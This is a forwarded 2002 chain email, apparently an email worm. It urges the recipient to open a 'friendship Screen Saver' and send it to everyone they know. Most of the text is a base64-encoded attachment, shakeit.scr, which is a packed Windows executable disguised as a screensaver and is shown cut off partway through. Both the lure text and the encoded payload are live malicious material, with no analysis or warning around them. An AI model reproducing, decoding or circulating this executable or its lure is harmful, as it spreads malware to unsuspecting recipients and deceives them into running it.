Check the Attachement ..

Edwin Renders

----- Original Message -----
From: "passionup" < lovers@friends.com >
To: < erenders@iaehv.nl >
Sent: Tue,25 Jun 2002 20:50:49 PM
Subject: !


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.friends.com to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://friends.com/remove?freescreensaver
* Enter your email address (erenders@iaehv.nl) in the field provided and click "Unsubscribe".

OR...

* Reply to this message with the word "REMOVE" in the subject line.

This message was sent to address erenders@iaehv.nl
X-PMG-Recipient: erenders@iaehv.nl
<<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>>
--mtswgrj Content-Type: application/octet-stream; name=shakeit.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="shakeit.scr" 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 